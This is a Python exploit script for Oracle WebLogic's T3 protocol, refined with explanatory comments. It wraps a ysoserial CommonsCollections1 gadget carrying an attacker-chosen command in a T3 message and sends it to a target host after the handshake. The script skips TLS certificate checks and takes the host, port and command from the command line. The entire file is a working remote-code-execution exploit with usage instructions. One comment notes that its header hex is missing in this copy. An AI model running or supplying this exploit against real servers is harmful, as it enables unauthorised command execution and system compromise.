import base64
import binascii
import os
import socket
import ssl
import subprocess
import sys
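def _build_t3_payload(cmd):
    """Return the raw T3 message bytes that carry the ysoserial gadget for ``cmd``.

    Runs ``java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 <cmd>``
    and captures its stdout (the serialized Java object) directly, instead of
    building a shell command line and round-tripping through a scratch file
    named ``cmd`` in the working directory.  ``cmd`` is handed to ysoserial as
    one argv element, so quotes and shell metacharacters in it are not
    interpreted locally.

    Raises:
        subprocess.CalledProcessError: ysoserial exited non-zero.
        ValueError: the length placeholder is missing from the message header,
            or the finished message does not fit the 16-bit length field.
        binascii.Error / TypeError: one of the hex constants is not valid hex.
    """
    # Hex of the T3 message prefix that precedes the serialized object; it
    # holds the 16-bit length placeholder patched below.
    # NOTE(review): this literal is not valid hex in this copy of the file;
    # restore the original header hex before running (unhexlify() fails
    # otherwise and the error is reported by weblogic()).
    head_hex = b'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'
    # Hex trailer appended after the gadget.  Decoding it shows a Java
    # serialization stream (magic ACED 0005) naming
    # weblogic.rjvm.ImmutableServiceContext, weblogic.rmi.provider.BasicServiceContext,
    # weblogic.rmi.internal.MethodDescriptor and the string
    # "authenticate(Lweblogic.security.acl.UserInfo;)".
    tail_hex = b'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    # Nibble sequence in head_hex that stands for the message length (2 bytes).
    length_placeholder = b'0970'

    serialized = subprocess.check_output(
        ['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections1', cmd])
    gadget_hex = binascii.hexlify(serialized)

    # The replacement below is the same length as the placeholder, so the
    # total can be computed before patching (as the original did).
    total_bytes = (len(head_hex) + len(gadget_hex) + len(tail_hex)) // 2
    if total_bytes > 0xffff:
        # '%04x' would emit 5 digits, leaving an odd-length hex string and a
        # length field that no longer matches the placeholder width.
        raise ValueError('payload is %d bytes; the length placeholder only holds 16 bits'
                         % total_bytes)
    if length_placeholder not in head_hex:
        raise ValueError('length placeholder %r not found in the message header'
                         % (length_placeholder,))
    length_hex = ('%04x' % total_bytes).encode('ascii')
    # Patch only the first placeholder in the header.  The original replaced
    # every "0970" in the whole hex string, which corrupts the gadget bytes
    # whenever that nibble sequence happens to occur inside them (it can also
    # match across a byte boundary).
    payload_hex = head_hex.replace(length_placeholder, length_hex, 1) + gadget_hex + tail_hex
    print('len/2:%s' % total_bytes)
    print('payload for hex:%s' % length_hex.decode('ascii'))
    print(payload_hex.decode('ascii'))
    return binascii.unhexlify(payload_hex)


def weblogic(ip, port, cmd, use_ssl=None, timeout=None):
    """Send a ysoserial CommonsCollections1 gadget chain to a WebLogic T3 listener.

    Connects to ``ip:port`` (plain TCP or TLS), performs the T3 protocol
    handshake, reads the server's reply, then sends one T3 message whose body
    is the serialized Java object produced by ysoserial for ``cmd``.  Nothing
    is returned; progress goes to stdout and the banner/errors to stderr.
    Any exception is reported as ``error:<message>`` on stderr rather than
    propagated, as in the original.

    Args:
        ip: target host name or address.
        port: target port, as an int or a numeric string (argv form).
        cmd: operating-system command embedded in the gadget chain.  It is
            passed to ysoserial verbatim as a single argument.
        use_ssl: wrap the connection in TLS.  ``None`` keeps the original rule
            "TLS iff port == 443" — now evaluated on the numeric port, because
            argv supplies a string and ``'443' == 443`` is False, so the TLS
            branch could never be taken from the command line.
        timeout: socket timeout in seconds; ``None`` blocks indefinitely, as
            the original did.

    Requires ``java`` on PATH and ``ysoserial-0.0.5-SNAPSHOT-all.jar`` in the
    current directory.  Run only against systems you are authorised to test.
    """
    # T3 handshake; the same bytes the original kept as a hex blob.
    t3_handshake = b't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
    sock = None
    try:
        port = int(port)
        if use_ssl is None:
            use_ssl = (port == 443)
        # Build the payload first so a missing jar / bad command fails before
        # anything is sent to the target.
        payload = _build_t3_payload(cmd)

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        if use_ssl:
            # No certificate validation, matching the original bare
            # ssl.wrap_socket(); ssl.wrap_socket itself is removed in 3.12.
            ctx = ssl.create_default_context()
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            sock = ctx.wrap_socket(sock, server_hostname=ip)

        server_address = (ip, port)
        print('connecting to %s port %s' % (server_address, port))
        sock.connect(server_address)
        print('sending "%s"' % binascii.hexlify(t3_handshake).decode('ascii'))
        sock.sendall(t3_handshake)
        banner = sock.recv(1024)
        sys.stderr.write('received "%r"\n' % (banner,))
        # sendall, not send: a short send would truncate the message.
        sock.sendall(payload)
    except Exception as e:
        sys.stderr.write('error:%s\n' % e)
    finally:
        # Always release the socket; the original never closed it (and its
        # "open('cmd').close" never called close() either).
        if sock is not None:
            sock.close()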
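if __name__ == '__main__':
    # Usage: weblogic.py <host> <port> <command>
    # Guarded so importing the module does not fire the exploit, and so a
    # missing argument gives a usage line instead of an IndexError traceback.
    if len(sys.argv) < 4:
        sys.stderr.write('usage: %s <host> <port> <command>\n' % sys.argv[0])
        sys.exit(2)
    weblogic(sys.argv[1], sys.argv[2], sys.argv[3])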